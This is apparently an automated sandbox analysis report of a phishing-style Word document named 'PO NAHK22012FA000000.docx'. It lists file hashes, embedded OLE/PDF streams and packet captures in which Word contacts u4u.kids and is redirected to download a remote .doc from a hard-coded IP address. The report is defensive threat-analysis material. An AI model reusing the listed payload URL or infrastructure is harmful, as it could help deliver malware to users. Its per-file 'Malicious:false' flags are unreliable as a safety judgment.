                SHA-256:4B8C91F700C6EE9F57B33D54B26992EC5D656EAF7CD45F1BF7D350E500B1BA6C
                SHA-512:486CCCD67F4926B9A7E33AEF12FD91822EF384314103342775F9B3A5CFE9544D3960020CDCE66BF92F8A4DEA1ED31CEA9315D4CD1AD8932FC361F403DBCFCB0D
                Malicious:false
                Preview:PK..........!.................[Content_Types].xml ...(....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................VMo.0.....0t.l..0.C.....X..........&.~...].D..........E..V.#x.....Leki.%.....f..aj....m.......r..3.6X.6...s.Z......Jc...>..;Q.5........`B.".[.B#.T.n6..W...e...HU2...$.?.z.$.M#+.m......nW..........K..m.r8.........c+.~ k.0..Y..S.9......Qc...*.w.xK'....;..w........>.V.&.h...........4;.....U...U..#.....4...1J4.1.x..f...1$.w.~s.c:>#'%<...d*^.'.4..c......"...i.!'%.../...=.H..7..$..8...m..G..e....O.?2..F..X)8...

                C:\Users\user\Desktop\~$ NAHK22012FA000000.docx

                Download File
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:data
                Category:dropped
                Size (bytes):162
                Entropy (8bit):2.4797606462020307
                Encrypted:false
                SSDEEP:3:vrJlaCkWtVyHlqlzl0pbklMWjV4lc+/dllln:vdsCkWtWYlz21kF2JV/l
                MD5:2CF7D3B8DED3F1D5CE1AC92F3E51D4ED
                SHA1:95E13378EA9CACA068B2687F01E9EF13F56627C2
                SHA-256:60DF94CDE4FD9B4A73BB13775079D75CE954B75DED5A2878277FA64AD767CAB1
                SHA-512:2D5797FBBE44766D93A5DE3D92911358C70D8BE60D5DF542ECEDB77D1195DC1EEF85E4CA1445595BE81550335A20AB3F11B512385FE20F75B1E269D6AB048E0A
                Malicious:false
                Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

                C:\Users\user\Desktop\~WRD0000.tmp

                Download File
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:Microsoft Word 2007+
                Category:dropped
                Size (bytes):511159
                Entropy (8bit):7.984551477565033
                Encrypted:false
                SSDEEP:12288:OIPqAC/+QF7bWa2XZqIfZvpEjPj/m7eQMPmLJ:ByGEbvOdVpEP/mKQMPmF
                MD5:5F812E0FB0A04215804082890159CA22
                SHA1:BB90FCF3EDB65162D4F92F55533585BD83AB813A
                SHA-256:4B8C91F700C6EE9F57B33D54B26992EC5D656EAF7CD45F1BF7D350E500B1BA6C
                SHA-512:486CCCD67F4926B9A7E33AEF12FD91822EF384314103342775F9B3A5CFE9544D3960020CDCE66BF92F8A4DEA1ED31CEA9315D4CD1AD8932FC361F403DBCFCB0D
                Malicious:false
                Preview:PK..........!.................[Content_Types].xml ...(....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................VMo.0.....0t.l..0.C.....X..........&.~...].D..........E..V.#x.....Leki.%.....f..aj....m.......r..3.6X.6...s.Z......Jc...>..;Q.5........`B.".[.B#.T.n6..W...e...HU2...$.?.z.$.M#+.m......nW..........K..m.r8.........c+.~ k.0..Y..S.9......Qc...*.w.xK'....;..w........>.V.&.h...........4;.....U...U..#.....4...1J4.1.x..f...1$.w.~s.c:>#'%<...d*^.'.4..c......"...i.!'%.../...=.H..7..$..8...m..G..e....O.?2..F..X)8...

                C:\Users\user\Desktop\~WRD0000.tmp:Zone.Identifier

                Download File
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:ASCII text, with CRLF line terminators
                Category:modified
                Size (bytes):26
                Entropy (8bit):3.95006375643621
                Encrypted:false
                SSDEEP:3:ggPYV:rPYV
                MD5:187F488E27DB4AF347237FE461A079AD
                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                Malicious:false
                Preview:[ZoneTransfer]....ZoneId=0

                Static File Info

                General

                File type:Microsoft Word 2007+
                Entropy (8bit):7.992586467445748
                TrID:
                • Word Microsoft Office Open XML Format document (49504/1) 58.23%
                • Word Microsoft Office Open XML Format document (27504/1) 32.35%
                • ZIP compressed archive (8000/1) 9.41%
                File name:PO NAHK22012FA000000.docx
                File size:464'442 bytes
                MD5:48dd0e8d2647a5d093f64f186dcac877
                SHA1:258650076b605d2d46984016ad2986e7e41b6b9e
                SHA256:e24a47e78d936fa0738d80c11910fbdf8d90d384c7584c355d56a94252323f16
                SHA512:d8ec5aebfd4ed529e4c5d59a5f025ef45942bedf5315b0166ba2b4a4650ac75640689b506ce6e130e10476f7292d839d17f0dc79cd72a8175eb91e0c34afec4d
                SSDEEP:12288:bx2ZjDyAincQBGCksr6Jl9Fnme6X4IKHlKLycN9GGdC:bx2VSNG39oNILHYG8C
                TLSH:04A423B164823588E3DD41B5E0134E3FF424BC449AF15B6BF670F13CADDAA856E94B42
                File Content Preview:PK.........XWY...k....'.......[Content_Types].xmlUT......g...g...g.V.n.0....?......(..r.].M...@.#.-E..Ib.}..c.A"9u._$..............._.y5..x....Z...V~....F....[@q.|.nq.....=..%...D.B....<G..:E...2*.[.A^.f.....SI.C,.7l Y...J.]u.#.C2...| ...D...e.Z.......|..

                File Icon

                Icon Hash:65e6a3a3afb7bdbf

                Static OLE Info

                General

                Document Type:OpenXML
                Number of OLE Files:2

                OLE File "PO NAHK22012FA000000.docx"

                Indicators
                Has Summary Info:
                Application Name:
                Encrypted Document:False
                Contains Word Document Stream:True
                Contains Workbook/Book Stream:False
                Contains PowerPoint Document Stream:False
                Contains Visio Document Stream:False
                Contains ObjectPool Stream:False
                Flash Objects Count:0
                Contains VBA Macros:False
                Summary
                Title:
                Subject:
                Author:91974
                Keywords:
                Template:Normal.dotm
                Last Saved By:91974
                Revion Number:2
                Total Edit Time:1
                Create Time:2024-10-22T10:35:00Z
                Last Saved Time:2024-10-22T10:36:00Z
                Number of Pages:1
                Number of Words:0
                Number of Characters:0
                Creating Application:Microsoft Office Word
                Security:0
                Document Summary
                Number of Lines:1
                Number of Paragraphs:1
                Thumbnail Scaling Desired:false
                Company:Grizli777
                Contains Dirty Links:false
                Shared Document:false
                Changed Hyperlinks:false
                Application Version:12.0000

                Streams

                Stream Path: \x1CompObj, File Type: data, Stream Size: 94
                General
                Stream Path:\x1CompObj
                CLSID:
                File Type:data
                Stream Size:94
                Entropy:4.345966460061678
                Base64 Encoded:False
                Data ASCII:. . . . . . e . . D E S T . . . . . . A c r o b a t D o c u m e n t . . . . . . . . . A c r o E x c h . D o c u m e n t . D C . 9 q . . . . . . . . . . . .
                Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 65 ca 01 b8 fc a1 d0 11 85 ad 44 45 53 54 00 00 11 00 00 00 41 63 72 6f 62 61 74 20 44 6f 63 75 6d 65 6e 74 00 00 00 00 00 15 00 00 00 41 63 72 6f 45 78 63 68 2e 44 6f 63 75 6d 65 6e 74 2e 44 43 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                Stream Path: \x1Ole, File Type: data, Stream Size: 20
                General
                Stream Path:\x1Ole
                CLSID:
                File Type:data
                Stream Size:20
                Entropy:0.8475846798245739
                Base64 Encoded:False
                Data ASCII:. . . . . . . . . . . . . . . . . . . .
                Data Raw:01 00 00 02 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                Stream Path: \x3ObjInfo, File Type: data, Stream Size: 6
                General
                Stream Path:\x3ObjInfo
                CLSID:
                File Type:data
                Stream Size:6
                Entropy:1.2516291673878228
                Base64 Encoded:False
                Data ASCII:. . . . . .
                Data Raw:00 00 03 00 0d 00
                Stream Path: CONTENTS, File Type: PDF document, version 1.7, 1 pages, Stream Size: 208625
                General
                Stream Path:CONTENTS
                CLSID:
                File Type:PDF document, version 1.7, 1 pages
                Stream Size:208625
                Entropy:7.986402136830817
                Base64 Encoded:True
                Data ASCII:% P D F - 1 . 7 . % . . . 3 0 o b j . < < / A u t h o r ( ) / C o m m e n t s ( ) / C o m p a n y ( ) / C r e a t i o n D a t e ( D : 2 0 2 4 0 8 1 3 0 9 4 0 4 3 + 0 8 ' 0 0 ' ) / C r e a t o r ( . W . P . S . h h < ) / K e y w o r d s ( ) / M o d D a t e ( D : 2 0 2 4 0 8 1 3 0 9 4 0 4 3 + 0 8 ' 0 0 ' ) / P r o d u c e r ( ) / S o u r c e M o d i f i e d ( D : 2 0 2 4 0 8 1 3 0 9 4 0 4 3 + 0 8 ' 0 0 ' ) / S u b j e c t ( ) / T i t l e ( ) / T r a p p e d
                Data Raw:25 50 44 46 2d 31 2e 37 0a 25 c2 b3 c7 d8 0d 0a 33 20 30 20 6f 62 6a 0d 3c 3c 2f 41 75 74 68 6f 72 20 28 29 20 2f 43 6f 6d 6d 65 6e 74 73 20 28 29 20 2f 43 6f 6d 70 61 6e 79 20 28 29 20 2f 43 72 65 61 74 69 6f 6e 44 61 74 65 20 28 44 3a 32 30 32 34 30 38 31 33 30 39 34 30 34 33 2b 30 38 27 30 30 27 29 20 2f 43 72 65 61 74 6f 72 20 28 fe ff 00 57 00 50 00 53 00 20 88 68 68 3c 29 20

                OLE File "PO NAHK22012FA000000.docx"

                Indicators
                Has Summary Info:
                Application Name:
                Encrypted Document:False
                Contains Word Document Stream:True
                Contains Workbook/Book Stream:False
                Contains PowerPoint Document Stream:False
                Contains Visio Document Stream:False
                Contains ObjectPool Stream:False
                Flash Objects Count:0
                Contains VBA Macros:False
                Summary
                Title:
                Subject:
                Author:91974
                Keywords:
                Template:Normal.dotm
                Last Saved By:91974
                Revion Number:2
                Total Edit Time:1
                Create Time:2024-10-22T10:35:00Z
                Last Saved Time:2024-10-22T10:36:00Z
                Number of Pages:1
                Number of Words:0
                Number of Characters:0
                Creating Application:Microsoft Office Word
                Security:0
                Document Summary
                Number of Lines:1
                Number of Paragraphs:1
                Thumbnail Scaling Desired:false
                Company:Grizli777
                Contains Dirty Links:false
                Shared Document:false
                Changed Hyperlinks:false
                Application Version:12.0000

                Streams

                Stream Path: \x1CompObj, File Type: data, Stream Size: 94
                General
                Stream Path:\x1CompObj
                CLSID:
                File Type:data
                Stream Size:94
                Entropy:4.345966460061678
                Base64 Encoded:False
                Data ASCII:. . . . . . e . . D E S T . . . . . . A c r o b a t D o c u m e n t . . . . . . . . . A c r o E x c h . D o c u m e n t . D C . 9 q . . . . . . . . . . . .
                Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 65 ca 01 b8 fc a1 d0 11 85 ad 44 45 53 54 00 00 11 00 00 00 41 63 72 6f 62 61 74 20 44 6f 63 75 6d 65 6e 74 00 00 00 00 00 15 00 00 00 41 63 72 6f 45 78 63 68 2e 44 6f 63 75 6d 65 6e 74 2e 44 43 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                Stream Path: \x1Ole, File Type: data, Stream Size: 20
                General
                Stream Path:\x1Ole
                CLSID:
                File Type:data
                Stream Size:20
                Entropy:0.8475846798245739
                Base64 Encoded:False
                Data ASCII:. . . . . . . . . . . . . . . . . . . .
                Data Raw:01 00 00 02 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                Stream Path: \x3ObjInfo, File Type: data, Stream Size: 6
                General
                Stream Path:\x3ObjInfo
                CLSID:
                File Type:data
                Stream Size:6
                Entropy:1.2516291673878228
                Base64 Encoded:False
                Data ASCII:. . . . . .
                Data Raw:00 00 03 00 0d 00
                Stream Path: CONTENTS, File Type: PDF document, version 1.4, 3 pages, Stream Size: 91631
                General
                Stream Path:CONTENTS
                CLSID:
                File Type:PDF document, version 1.4, 3 pages
                Stream Size:91631
                Entropy:6.456960855252374
                Base64 Encoded:True
                Data ASCII:% P D F - 1 . 4 . % . 2 0 o b j . < < / L e n g t h 4 9 / F i l t e r / F l a t e D e c o d e > > s t r e a m . x + r . 2 6 S 0 0 S . I r . . * T 0 T 0 . B . . f . . . . . e n d s t r e a m . e n d o b j . 4 0 o b j . < < / R e s o u r c e s < < / X O b j e c t < < / X f 1 1 0 R > > / P r o c S e t [ / P D F / T e x t / I m a g e B / I m a g e C / I m a g e I ] > > / M e d i a B o x [ 0 0 5 9 5 8 4 2 ] / P a r e n t 3 0 R / C o n t e n t s 2 0 R / T y p e / P a g
                Data Raw:25 50 44 46 2d 31 2e 34 0a 25 e2 e3 cf d3 0a 32 20 30 20 6f 62 6a 0a 3c 3c 2f 4c 65 6e 67 74 68 20 34 39 2f 46 69 6c 74 65 72 2f 46 6c 61 74 65 44 65 63 6f 64 65 3e 3e 73 74 72 65 61 6d 0a 78 9c 2b e4 72 0a e1 32 36 53 b0 30 30 53 08 49 e1 72 0d e1 0a e4 2a 54 30 54 30 00 42 08 99 9c ab a0 1f 91 66 a8 e0 92 af 10 c8 05 00 ea a2 09 f2 0a 65 6e 64 73 74 72 65 61 6d 0a 65 6e 64 6f 62

                Network Behavior

                Network Port Distribution

                TCP Packets

                TimestampSource PortDest PortSource IPDest IP
                Oct 23, 2024 17:50:05.450990915 CEST49164443192.168.2.2224.199.88.84
                Oct 23, 2024 17:50:05.451014042 CEST4434916424.199.88.84192.168.2.22
                Oct 23, 2024 17:50:05.451071978 CEST49164443192.168.2.2224.199.88.84
                Oct 23, 2024 17:50:05.459448099 CEST49164443192.168.2.2224.199.88.84
                Oct 23, 2024 17:50:05.459467888 CEST4434916424.199.88.84192.168.2.22
                Oct 23, 2024 17:50:06.152844906 CEST4434916424.199.88.84192.168.2.22
                Oct 23, 2024 17:50:06.152924061 CEST49164443192.168.2.2224.199.88.84
                Oct 23, 2024 17:50:06.159528971 CEST49164443192.168.2.2224.199.88.84
                Oct 23, 2024 17:50:06.159554005 CEST4434916424.199.88.84192.168.2.22
                Oct 23, 2024 17:50:06.159935951 CEST4434916424.199.88.84192.168.2.22
                Oct 23, 2024 17:50:06.159998894 CEST49164443192.168.2.2224.199.88.84
                Oct 23, 2024 17:50:06.273509979 CEST49164443192.168.2.2224.199.88.84
                Oct 23, 2024 17:50:06.315330982 CEST4434916424.199.88.84192.168.2.22
                Oct 23, 2024 17:50:06.440653086 CEST4434916424.199.88.84192.168.2.22
                Oct 23, 2024 17:50:06.440727949 CEST4434916424.199.88.84192.168.2.22
                Oct 23, 2024 17:50:06.440783978 CEST49164443192.168.2.2224.199.88.84
                Oct 23, 2024 17:50:06.440907955 CEST49164443192.168.2.2224.199.88.84
                Oct 23, 2024 17:50:06.446108103 CEST49164443192.168.2.2224.199.88.84
                Oct 23, 2024 17:50:06.446108103 CEST49164443192.168.2.2224.199.88.84
                Oct 23, 2024 17:50:06.446131945 CEST4434916424.199.88.84192.168.2.22
                Oct 23, 2024 17:50:06.446192026 CEST49164443192.168.2.2224.199.88.84
                Oct 23, 2024 17:50:06.878087044 CEST49165443192.168.2.2224.199.88.84
                Oct 23, 2024 17:50:06.878134966 CEST4434916524.199.88.84192.168.2.22
                Oct 23, 2024 17:50:06.878207922 CEST49165443192.168.2.2224.199.88.84
                Oct 23, 2024 17:50:06.878668070 CEST49165443192.168.2.2224.199.88.84
                Oct 23, 2024 17:50:06.878685951 CEST4434916524.199.88.84192.168.2.22
                Oct 23, 2024 17:50:07.564165115 CEST4434916524.199.88.84192.168.2.22
                Oct 23, 2024 17:50:07.564265966 CEST49165443192.168.2.2224.199.88.84
                Oct 23, 2024 17:50:07.569436073 CEST49165443192.168.2.2224.199.88.84
                Oct 23, 2024 17:50:07.569443941 CEST4434916524.199.88.84192.168.2.22
                Oct 23, 2024 17:50:07.569782019 CEST4434916524.199.88.84192.168.2.22
                Oct 23, 2024 17:50:07.576961994 CEST49165443192.168.2.2224.199.88.84
                Oct 23, 2024 17:50:07.619328976 CEST4434916524.199.88.84192.168.2.22
                Oct 23, 2024 17:50:07.755310059 CEST4434916524.199.88.84192.168.2.22
                Oct 23, 2024 17:50:07.755474091 CEST49165443192.168.2.2224.199.88.84
                Oct 23, 2024 17:50:07.755506992 CEST4434916524.199.88.84192.168.2.22
                Oct 23, 2024 17:50:07.755521059 CEST49165443192.168.2.2224.199.88.84
                Oct 23, 2024 17:50:07.755637884 CEST4434916524.199.88.84192.168.2.22
                Oct 23, 2024 17:50:07.755681038 CEST4434916524.199.88.84192.168.2.22
                Oct 23, 2024 17:50:07.755726099 CEST49165443192.168.2.2224.199.88.84
                Oct 23, 2024 17:50:11.562103987 CEST49166443192.168.2.2224.199.88.84
                Oct 23, 2024 17:50:11.562130928 CEST4434916624.199.88.84192.168.2.22
                Oct 23, 2024 17:50:11.562180042 CEST49166443192.168.2.2224.199.88.84
                Oct 23, 2024 17:50:11.562797070 CEST49166443192.168.2.2224.199.88.84
                Oct 23, 2024 17:50:11.562810898 CEST4434916624.199.88.84192.168.2.22
                Oct 23, 2024 17:50:12.265603065 CEST4434916624.199.88.84192.168.2.22
                Oct 23, 2024 17:50:12.265675068 CEST49166443192.168.2.2224.199.88.84
                Oct 23, 2024 17:50:12.269191980 CEST49166443192.168.2.2224.199.88.84
                Oct 23, 2024 17:50:12.269202948 CEST4434916624.199.88.84192.168.2.22
                Oct 23, 2024 17:50:12.269697905 CEST4434916624.199.88.84192.168.2.22
                Oct 23, 2024 17:50:12.283802986 CEST49166443192.168.2.2224.199.88.84
                Oct 23, 2024 17:50:12.331336975 CEST4434916624.199.88.84192.168.2.22
                Oct 23, 2024 17:50:12.449623108 CEST4434916624.199.88.84192.168.2.22
                Oct 23, 2024 17:50:12.449681997 CEST4434916624.199.88.84192.168.2.22
                Oct 23, 2024 17:50:12.449734926 CEST49166443192.168.2.2224.199.88.84
                Oct 23, 2024 17:50:12.454351902 CEST49166443192.168.2.2224.199.88.84
                Oct 23, 2024 17:50:12.454364061 CEST4434916624.199.88.84192.168.2.22
                Oct 23, 2024 17:50:12.775859118 CEST49167443192.168.2.2224.199.88.84
                Oct 23, 2024 17:50:12.775877953 CEST4434916724.199.88.84192.168.2.22
                Oct 23, 2024 17:50:12.775938034 CEST49167443192.168.2.2224.199.88.84
                Oct 23, 2024 17:50:12.776210070 CEST49167443192.168.2.2224.199.88.84
                Oct 23, 2024 17:50:12.776221991 CEST4434916724.199.88.84192.168.2.22
                Oct 23, 2024 17:50:13.464757919 CEST4434916724.199.88.84192.168.2.22
                Oct 23, 2024 17:50:13.464829922 CEST49167443192.168.2.2224.199.88.84
                Oct 23, 2024 17:50:13.471421957 CEST49167443192.168.2.2224.199.88.84
                Oct 23, 2024 17:50:13.471441031 CEST4434916724.199.88.84192.168.2.22
                Oct 23, 2024 17:50:13.471801996 CEST4434916724.199.88.84192.168.2.22
                Oct 23, 2024 17:50:13.473294973 CEST49167443192.168.2.2224.199.88.84
                Oct 23, 2024 17:50:13.515328884 CEST4434916724.199.88.84192.168.2.22
                Oct 23, 2024 17:50:13.639054060 CEST4434916724.199.88.84192.168.2.22
                Oct 23, 2024 17:50:13.639144897 CEST4434916724.199.88.84192.168.2.22
                Oct 23, 2024 17:50:13.639194965 CEST49167443192.168.2.2224.199.88.84
                Oct 23, 2024 17:50:13.644835949 CEST49167443192.168.2.2224.199.88.84
                Oct 23, 2024 17:50:13.644844055 CEST4434916724.199.88.84192.168.2.22
                Oct 23, 2024 17:50:13.670185089 CEST49168443192.168.2.2224.199.88.84
                Oct 23, 2024 17:50:13.670211077 CEST4434916824.199.88.84192.168.2.22
                Oct 23, 2024 17:50:13.670264006 CEST49168443192.168.2.2224.199.88.84
                Oct 23, 2024 17:50:13.670972109 CEST49168443192.168.2.2224.199.88.84
                Oct 23, 2024 17:50:13.670979977 CEST4434916824.199.88.84192.168.2.22
                Oct 23, 2024 17:50:14.364119053 CEST4434916824.199.88.84192.168.2.22
                Oct 23, 2024 17:50:14.365235090 CEST49168443192.168.2.2224.199.88.84
                Oct 23, 2024 17:50:14.365247965 CEST4434916824.199.88.84192.168.2.22
                Oct 23, 2024 17:50:14.365897894 CEST49168443192.168.2.2224.199.88.84
                Oct 23, 2024 17:50:14.365904093 CEST4434916824.199.88.84192.168.2.22
                Oct 23, 2024 17:50:14.536170959 CEST4434916824.199.88.84192.168.2.22
                Oct 23, 2024 17:50:14.536245108 CEST4434916824.199.88.84192.168.2.22
                Oct 23, 2024 17:50:14.536504030 CEST49168443192.168.2.2224.199.88.84
                Oct 23, 2024 17:50:14.536504030 CEST49168443192.168.2.2224.199.88.84
                Oct 23, 2024 17:50:14.964428902 CEST49169443192.168.2.2224.199.88.84
                Oct 23, 2024 17:50:14.964454889 CEST4434916924.199.88.84192.168.2.22
                Oct 23, 2024 17:50:14.964539051 CEST49169443192.168.2.2224.199.88.84
                Oct 23, 2024 17:50:14.964875937 CEST49169443192.168.2.2224.199.88.84
                Oct 23, 2024 17:50:14.964885950 CEST4434916924.199.88.84192.168.2.22
                Oct 23, 2024 17:50:15.643336058 CEST4434916924.199.88.84192.168.2.22
                Oct 23, 2024 17:50:15.643450975 CEST49169443192.168.2.2224.199.88.84
                Oct 23, 2024 17:50:15.645893097 CEST49169443192.168.2.2224.199.88.84
                Oct 23, 2024 17:50:15.645906925 CEST4434916924.199.88.84192.168.2.22
                Oct 23, 2024 17:50:15.648185968 CEST49169443192.168.2.2224.199.88.84
                Oct 23, 2024 17:50:15.648199081 CEST4434916924.199.88.84192.168.2.22
                Oct 23, 2024 17:50:15.815602064 CEST4434916924.199.88.84192.168.2.22
                Oct 23, 2024 17:50:15.815670967 CEST4434916924.199.88.84192.168.2.22
                Oct 23, 2024 17:50:15.815773964 CEST49169443192.168.2.2224.199.88.84
                Oct 23, 2024 17:50:15.815803051 CEST49169443192.168.2.2224.199.88.84
                Oct 23, 2024 17:50:15.820498943 CEST49169443192.168.2.2224.199.88.84
                Oct 23, 2024 17:50:15.820513964 CEST4434916924.199.88.84192.168.2.22
                Oct 23, 2024 17:50:15.839723110 CEST4917080192.168.2.2262.151.179.85
                Oct 23, 2024 17:50:15.845139027 CEST804917062.151.179.85192.168.2.22
                Oct 23, 2024 17:50:15.845217943 CEST4917080192.168.2.2262.151.179.85
                Oct 23, 2024 17:50:15.845347881 CEST4917080192.168.2.2262.151.179.85
                Oct 23, 2024 17:50:15.850738049 CEST804917062.151.179.85192.168.2.22
                Oct 23, 2024 17:50:24.328366995 CEST804917062.151.179.85192.168.2.22
                Oct 23, 2024 17:50:24.328528881 CEST4917080192.168.2.2262.151.179.85
                Oct 23, 2024 17:50:24.328592062 CEST4917080192.168.2.2262.151.179.85
                Oct 23, 2024 17:50:24.333865881 CEST804917062.151.179.85192.168.2.22

                UDP Packets

                TimestampSource PortDest PortSource IPDest IP
                Oct 23, 2024 17:50:05.433645964 CEST5456253192.168.2.228.8.8.8
                Oct 23, 2024 17:50:05.445492983 CEST53545628.8.8.8192.168.2.22
                Oct 23, 2024 17:50:06.848154068 CEST5291753192.168.2.228.8.8.8
                Oct 23, 2024 17:50:06.855402946 CEST53529178.8.8.8192.168.2.22
                Oct 23, 2024 17:50:06.857325077 CEST6275153192.168.2.228.8.8.8
                Oct 23, 2024 17:50:06.877630949 CEST53627518.8.8.8192.168.2.22
                Oct 23, 2024 17:50:11.054267883 CEST5789353192.168.2.228.8.8.8
                Oct 23, 2024 17:50:11.534637928 CEST53578938.8.8.8192.168.2.22
                Oct 23, 2024 17:50:11.537827015 CEST5482153192.168.2.228.8.8.8
                Oct 23, 2024 17:50:11.561645031 CEST53548218.8.8.8192.168.2.22
                Oct 23, 2024 17:50:12.753123045 CEST5471953192.168.2.228.8.8.8
                Oct 23, 2024 17:50:12.761215925 CEST53547198.8.8.8192.168.2.22
                Oct 23, 2024 17:50:12.767570019 CEST4988153192.168.2.228.8.8.8
                Oct 23, 2024 17:50:12.775480986 CEST53498818.8.8.8192.168.2.22

                DNS Queries

                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                Oct 23, 2024 17:50:05.433645964 CEST192.168.2.228.8.8.80x75edStandard query (0)u4u.kidsA (IP address)IN (0x0001)false
                Oct 23, 2024 17:50:06.848154068 CEST192.168.2.228.8.8.80xc615Standard query (0)u4u.kidsA (IP address)IN (0x0001)false
                Oct 23, 2024 17:50:06.857325077 CEST192.168.2.228.8.8.80xcc3Standard query (0)u4u.kidsA (IP address)IN (0x0001)false
                Oct 23, 2024 17:50:11.054267883 CEST192.168.2.228.8.8.80xc083Standard query (0)u4u.kidsA (IP address)IN (0x0001)false
                Oct 23, 2024 17:50:11.537827015 CEST192.168.2.228.8.8.80x1100Standard query (0)u4u.kidsA (IP address)IN (0x0001)false
                Oct 23, 2024 17:50:12.753123045 CEST192.168.2.228.8.8.80xb6ecStandard query (0)u4u.kidsA (IP address)IN (0x0001)false
                Oct 23, 2024 17:50:12.767570019 CEST192.168.2.228.8.8.80xd97eStandard query (0)u4u.kidsA (IP address)IN (0x0001)false

                DNS Answers

                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                Oct 23, 2024 17:50:05.445492983 CEST8.8.8.8192.168.2.220x75edNo error (0)u4u.kids24.199.88.84A (IP address)IN (0x0001)false
                Oct 23, 2024 17:50:06.855402946 CEST8.8.8.8192.168.2.220xc615No error (0)u4u.kids24.199.88.84A (IP address)IN (0x0001)false
                Oct 23, 2024 17:50:06.877630949 CEST8.8.8.8192.168.2.220xcc3No error (0)u4u.kids24.199.88.84A (IP address)IN (0x0001)false
                Oct 23, 2024 17:50:11.534637928 CEST8.8.8.8192.168.2.220xc083No error (0)u4u.kids24.199.88.84A (IP address)IN (0x0001)false
                Oct 23, 2024 17:50:11.561645031 CEST8.8.8.8192.168.2.220x1100No error (0)u4u.kids24.199.88.84A (IP address)IN (0x0001)false
                Oct 23, 2024 17:50:12.761215925 CEST8.8.8.8192.168.2.220xb6ecNo error (0)u4u.kids24.199.88.84A (IP address)IN (0x0001)false
                Oct 23, 2024 17:50:12.775480986 CEST8.8.8.8192.168.2.220xd97eNo error (0)u4u.kids24.199.88.84A (IP address)IN (0x0001)false

                HTTP Request Dependency Graph

                • u4u.kids
                • 62.151.179.85

                HTTP Packets

                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                0192.168.2.224917062.151.179.85803312C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                TimestampBytes transferredDirectionData
                Oct 23, 2024 17:50:15.845347881 CEST521OUTGET /202/men/me/wegvenbestthingswithgoodthingswithgreatthings_______________verygoodpersonwithgreatcookieswithniceworkingpillwithgnice_________wearegoodforniceworkingthingstobein.doc HTTP/1.1
                Accept: */*
                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)
                UA-CPU: AMD64
                Accept-Encoding: gzip, deflate
                Host: 62.151.179.85
                Connection: Keep-Alive


                HTTPS Proxied Packets

                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                0192.168.2.224916424.199.88.844433312C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                TimestampBytes transferredDirectionData
                2024-10-23 15:50:06 UTC130OUTOPTIONS / HTTP/1.1
                User-Agent: Microsoft Office Protocol Discovery
                Host: u4u.kids
                Content-Length: 0
                Connection: Keep-Alive
                2024-10-23 15:50:06 UTC439INHTTP/1.1 200 OK
                Server: nginx/1.18.0 (Ubuntu)
                Date: Wed, 23 Oct 2024 15:50:06 GMT
                Content-Type: text/html; charset=utf-8
                Content-Length: 8
                Connection: close
                X-DNS-Prefetch-Control: off
                X-Frame-Options: SAMEORIGIN
                Strict-Transport-Security: max-age=15552000; includeSubDomains
                X-Download-Options: noopen
                X-Content-Type-Options: nosniff
                X-XSS-Protection: 1; mode=block
                Allow: GET,HEAD
                ETag: W/"8-ZRAf8oNBS3Bjb/SU2GYZCmbtmXg"
                2024-10-23 15:50:06 UTC8INData Raw: 47 45 54 2c 48 45 41 44
                Data Ascii: GET,HEAD


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                1192.168.2.224916524.199.88.844433312C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                TimestampBytes transferredDirectionData
                2024-10-23 15:50:07 UTC231OUTHEAD /rxbtFA?&gamma-ray=angry&polo=arrogant&smog=earsplitting&peony=aloof&roast=big&children=squealing&swiss=mammoth&disarmament HTTP/1.1
                Connection: Keep-Alive
                User-Agent: Microsoft Office Existence Discovery
                Host: u4u.kids
                2024-10-23 15:50:07 UTC611INHTTP/1.1 302 Found
                Server: nginx/1.18.0 (Ubuntu)
                Date: Wed, 23 Oct 2024 15:50:07 GMT
                Content-Type: text/plain; charset=utf-8
                Content-Length: 220
                Connection: close
                X-DNS-Prefetch-Control: off
                X-Frame-Options: SAMEORIGIN
                Strict-Transport-Security: max-age=15552000; includeSubDomains
                X-Download-Options: noopen
                X-Content-Type-Options: nosniff
                X-XSS-Protection: 1; mode=block
                Location: http://62.151.179.85/202/men/me/wegvenbestthingswithgoodthingswithgreatthings_______________verygoodpersonwithgreatcookieswithniceworkingpillwithgnice_________wearegoodforniceworkingthingstobein.doc
                Vary: Accept


                Session IDSource IPSource PortDestination IPDestination Port
                2192.168.2.224916624.199.88.84443
                TimestampBytes transferredDirectionData
                2024-10-23 15:50:12 UTC125OUTOPTIONS / HTTP/1.1
                Connection: Keep-Alive
                User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601
                translate: f
                Host: u4u.kids
                2024-10-23 15:50:12 UTC439INHTTP/1.1 200 OK
                Server: nginx/1.18.0 (Ubuntu)
                Date: Wed, 23 Oct 2024 15:50:12 GMT
                Content-Type: text/html; charset=utf-8
                Content-Length: 8
                Connection: close
